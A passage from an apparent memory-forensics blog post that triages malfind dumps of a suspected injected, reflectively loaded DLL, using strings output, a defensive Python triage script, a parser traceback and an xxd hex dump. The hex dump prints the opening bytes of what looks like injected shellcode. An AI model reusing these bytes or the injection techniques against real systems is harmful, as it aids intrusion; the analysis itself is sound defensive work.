font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>1<span class="Apple-converted-space"> </span>CreateFile2</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>1<span class="Apple-converted-space"> </span>CreateFileA</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>1<span class="Apple-converted-space"> </span>CreateFileW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>1<span class="Apple-converted-space"> </span>CreateMutexA</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>1<span class="Apple-converted-space"> </span>CreateRemoteThread</span></p><p class="p1" 
style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>1<span class="Apple-converted-space"> </span>CreateSemaphoreExW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>1<span class="Apple-converted-space"> </span>CreateSymbolicLinkW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>1<span class="Apple-converted-space"> </span>CreateThread</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>1<span class="Apple-converted-space"> </span>CreateThreadpoolTimer</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span 
class="Apple-converted-space"> </span>1<span class="Apple-converted-space"> </span>CreateThreadpoolWait</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>1<span class="Apple-converted-space"> </span>NtCreateSection</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>1<span class="Apple-converted-space"> </span>RtlCreateUserThread</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>2<span class="Apple-converted-space"> </span>CreateToolhelp32Snapshot</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">davehull@scrutiny:~/res/malfind_dump$ grep Reflective *.words</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span 
class="s1" style="font-variant-ligatures: no-common-ligatures;"></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>2<span class="Apple-converted-space"> </span>ReflectiveLoader</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">davehull@scrutiny:~/res/malfind_dump$ grep -i "\.dll" *.words</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>1<span class="Apple-converted-space"> </span>CRYPT32.dll</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>1<span class="Apple-converted-space"> </span>kernel32.dll</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: 
no-common-ligatures;"><span class="Apple-converted-space"> </span>1<span class="Apple-converted-space"> </span>KERNEL32.dll</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>1<span class="Apple-converted-space"> </span>USER32.dll</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>1<span class="Apple-converted-space"> </span>WININET.dll</span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><br /></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 
0px;">Above are what appear to be Windows API function names and the names of some DLLs, which may be imports or names that a loader resolves by hand. Taken together, <font face="courier">ReflectiveLoader</font> alongside <font face="courier">CreateRemoteThread</font>, <font face="courier">RtlCreateUserThread</font>, <font face="courier">NtCreateSection</font>, <font face="courier">CreateToolhelp32Snapshot</font> and <font face="courier">WININET.dll</font> is consistent with an injected, reflectively loaded DLL that talks HTTP, though strings alone can't tell us how any of them are actually used. There are many strings related to SSL and TLS (not shown). Alas our use of <font face="courier">strings</font> is akin to groping around in the dark. We could proceed this way through the other files, but there are better tools for the job.</div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">The prolific producer of prodigious probing programs, <a href="https://twitter.com/williballenthin" target="_blank">Willi Ballenthin</a>, has written a <a href="https://gist.github.com/williballenthin/cbc102d561e2eb647f7aec3c3753ba55" target="_blank">wrapper</a> around <a href="https://github.com/vivisect/vivisect" target="_blank">Vivisect</a> that can extract certain features from <a href="https://docs.microsoft.com/en-us/previous-versions/ms809762(v=msdn.10)?redirectedfrom=MSDN" target="_blank">PE</a> files dumped from memory. 
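Before running it, here is the triage so far gathered into one place. This is an added Python example written for this edit, not the post's own tooling and not Willi's wrapper: it reimplements the strings, frequency and wordlist pipeline from above so it runs without binutils (the UTF-16 scan differs from GNU strings in that it is not locked to even offsets), and it adds the pre-flight header check worth doing before handing any malfind dump to a PE parser. The dump bytes and the wordlist in it are constructed for the example, except that the first 64 bytes of the sample are copied from the xxd output of this dump that appears further down.

```python
"""Added example, not the post's own tooling: the strings -> frequency ->
wordlist triage from above, reimplemented in Python, plus a pre-flight PE
header check that shows why a PE parser can overrun on a malfind dump."""
import re
from collections import Counter

MIN_LEN = 4  # GNU strings' default minimum string length

# Printable-ASCII runs, as strings(1) finds them; UTF-16LE runs are
# printable-byte/NUL pairs, as strings -e l finds them. Unlike GNU strings the
# UTF-16 scan is not locked to even offsets, so it also catches odd-aligned text.
_ASCII = re.compile(rb'[\x20-\x7e]{%d,}' % MIN_LEN)
_UTF16LE = re.compile(rb'(?:[\x20-\x7e]\x00){%d,}' % MIN_LEN)


def extract_strings(data):
    """Yield (offset, encoding, text), like strings -a -t d followed by -e l."""
    for m in _ASCII.finditer(data):
        yield m.start(), 'ascii', m.group().decode('ascii')
    for m in _UTF16LE.finditer(data):
        yield m.start(), 'utf-16le', m.group().decode('utf-16le')


def least_frequent_first(strings):
    """[(count, text)] ascending by count: the sort | uniq -c | sort -g step."""
    counts = Counter(text for _, _, text in strings)
    return sorted((count, text) for text, count in counts.items())


def load_wordlist(lines, min_len=MIN_LEN):
    """The post's dictionary cleanup: drop apostrophes and words shorter than
    min_len (with fixed-string matching, short words hit almost every line)."""
    words = {line.strip() for line in lines}
    return {w for w in words if w and "'" not in w and len(w) >= min_len}


def dictionary_hits(lfo, words):
    """grep -iFf wordlist: keep rows whose text contains any word, ignoring case.
    One alternation regex stands in for grep's multi-pattern matcher."""
    if not words:
        return []
    alternation = '|'.join(re.escape(w) for w in sorted(words, key=len, reverse=True))
    pattern = re.compile(alternation, re.IGNORECASE)
    return [(count, text) for count, text in lfo if pattern.search(text)]


def triage(data, wordlist_lines):
    """Run the whole pipeline; 'counts' mirrors the post's wc -l numbers."""
    strings = list(extract_strings(data))
    lfo = least_frequent_first(strings)
    words = dictionary_hits(lfo, load_wordlist(wordlist_lines))
    return {'strings': strings, 'lfo': lfo, 'words': words,
            'counts': {'strings': len(strings), 'lfo': len(lfo), 'words': len(words)}}


def pe_header_check(data):
    """Pre-flight check before any PE parser: is there an MZ signature, and does
    e_lfanew (the DWORD at 0x3c) point at 'PE\\0\\0' inside the buffer? A parser
    that trusts e_lfanew blindly seeks there and overruns when it does not."""
    if len(data) < 0x40:
        return {'mz': False, 'e_lfanew': None, 'nt_in_bounds': False, 'pe_signature': False}
    e_lfanew = int.from_bytes(data[0x3c:0x40], 'little')
    in_bounds = e_lfanew + 4 <= len(data)
    return {'mz': data[:2] == b'MZ',
            'e_lfanew': e_lfanew,
            'nt_in_bounds': in_bounds,
            'pe_signature': in_bounds and data[e_lfanew:e_lfanew + 4] == b'PE\x00\x00'}


# Constructed sample. The first 64 bytes are copied from the post's xxd output of
# process.0xfffffa8005138980.0xdc0000.dmp; everything after them is made up.
SAMPLE_HEADER = bytes.fromhex(
    'fc4889ce4881ec002000004883e4f0e8'
    'cc000000415141505251564831d26548'
    '8b5260488b5218488b5220488b725048'
    '0fb74a4a4d31c94831c0ac3c617c022c')
SAMPLE_DUMP = (SAMPLE_HEADER + b'\x00'
               + b'CreateRemoteThread\x00ReflectiveLoader\x00ReflectiveLoader\x00\x00'
               + 'WININET.dll'.encode('utf-16le') + b'\x00\x00abc\x00')
# Constructed wordlist: two entries the cleanup should drop, plus a blank line.
SAMPLE_WORDLIST = ['create', 'reflective', 'thread', "don't", 'ab', '  ']
# Constructed contrast case: the smallest buffer the header check accepts.
MINIMAL_PE_HEAD = b'MZ' + b'\x00' * 58 + (0x40).to_bytes(4, 'little') + b'PE\x00\x00'

if __name__ == '__main__':
    result = triage(SAMPLE_DUMP, SAMPLE_WORDLIST)
    print(result['counts'])
    for count, text in result['words']:
        print(f'{count:7d} {text}')
    print(pe_header_check(SAMPLE_DUMP))   # bogus e_lfanew, no MZ signature
    print(pe_header_check(MINIMAL_PE_HEAD))
```

Run as a script it prints the wc -l style counts, the dictionary hits and both header checks for the sample; on a real dump, read the file in binary mode and pass the lines of /usr/share/dict/american-english as the wordlist. Note what the header check says about the sample: no MZ signature, and an e_lfanew of 738360417, which is the same offset memdumppe.py reports in the overrun below, because the DWORD at 0x3c of whatever this dump begins with is being read as a header field.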
Here's what </font><font face="courier">memdumppe.py</font><font face="inherit"> produces against the first dump:</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font size="2">davehull@scrutiny:~/res/malfind_dump$ memdumppe.py process.0xfffffa8005138980.0xdc0000.dmp 0<span class="Apple-converted-space"> </span></font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Traceback (most recent call last):</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 
0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>File "/home/davehull/bin/memdumppe.py", line 280, in <module></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>sys.exit(main())</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>File "/home/davehull/bin/memdumppe.py", line 265, in main</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>pe = PE.PE(fv, inmem=guess_is_memory_image(fv))</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>File "/home/davehull/.local/lib/python2.7/site-packages/PE/__init__.py", line 377, in __init__</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; 
font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>"pe.IMAGE_NT_HEADERS")</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>File "/home/davehull/.local/lib/python2.7/site-packages/PE/__init__.py", line 481, in readStructAtOffset</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>sbytes = self.readAtOffset(offset, len(s))</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>File "/home/davehull/.local/lib/python2.7/site-packages/PE/__init__.py", line 659, in readAtOffset</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>self.fd.seek(offset)</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 
0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>File "/home/davehull/bin/memdumppe.py", line 117, in seek</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>raise IOError('cant read offset %d (overrun)' % (final_offset - self.start))</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">IOError: cant read offset 738360417 (overrun)</span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: 
white; font-variant-ligatures: no-common-ligatures;">Not entirely useful at first glance, but the number in the overrun is a clue. 738360417 is 0x2c027c61, and those are the four bytes at offset 0x3c of the dump (<font face="courier">61 7c 02 2c</font>, little-endian) read as <font face="courier">e_lfanew</font>: with an offset of 0, <font face="courier">memdumppe.py</font> treated the bytes at the start of the dump as a DOS header and followed a garbage pointer. Let's take a look at the file using <font face="courier">xxd</font>:</span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><br /></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font size="2">davehull@scrutiny:~/res/malfind_dump$ xxd process.0xfffffa8005138980.0xdc0000.dmp</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">00000000: fc48 89ce 4881 ec00 2000 0048 83e4 f0e8<span class="Apple-converted-space"> </span>.H..H... 
..H....</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">00000010: cc00 0000 4151 4150 5251 5648 31d2 6548<span class="Apple-converted-space"> </span>....AQAPRQVH1.eH</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">00000020: 8b52 6048 8b52 1848 8b52 2048 8b72 5048<span class="Apple-converted-space"> </span>.R`H.R.H.R H.rPH</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">00000030: 0fb7 4a4a 4d31 c948 31c0 ac3c 617c 022c<span class="Apple-converted-space"> </span>..JJM1.H1..<a|.,</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">00000040: 2041 c1c9 0d41 01c1 e2ed 5241 5148 8b52 <span class="Apple-converted-space"> </span>A...A....RAQH.R</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: 
no-common-ligatures;">00000050: 208b 423c 4801 d066 8178 180b 020f 8572 <span class="Apple-converted-space"> </span>.B<H..f.x.....r</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">00000060: 0000 008b 8088 0000 0048 85c0 7467 4801<span class="Apple-converted-space"> </span>.........H..tgH.</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">00000070: d050 8b48 1844 8b40 2049 01d0 e356 48ff<span class="Apple-converted-space"> </span>.P.H.D.@ I...VH.</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">00000080: c941 8b34 8848 01d6 4d31 c948 31c0 ac41<span class="Apple-converted-space"> </span>.A.4.H..M1.H1..A</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">00000090: c1c9 0d41 01c1 38e0 75f1 4c03 4c24 0845<span class="Apple-converted-space"> </span>...A..8.u.L.L$.E</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: 
normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">000000a0: 39d1 75d8 5844 8b40 2449 01d0 6641 8b0c<span class="Apple-converted-space"> </span>9.u.XD.@$I..fA..</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">000000b0: 4844 8b40 1c49 01d0 418b 0488 4801 d041<span class="Apple-converted-space"> </span>HD.@.I..A...H..A</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">000000c0: 5841 585e 595a 4158 4159 415a 4883 ec20<span class="Apple-converted-space"> </span>XAX^YZAXAYAZH..<span class="Apple-converted-space"> </span></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">000000d0: 4152 ffe0 5841 595a 488b 12e9 4bff ffff<span class="Apple-converted-space"> </span>AR..XAYZH...K...</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">000000e0: 5d48 8b0e 41ba 1d9f 2635 ffd5 ff56 0870<span class="Apple-converted-space"> 
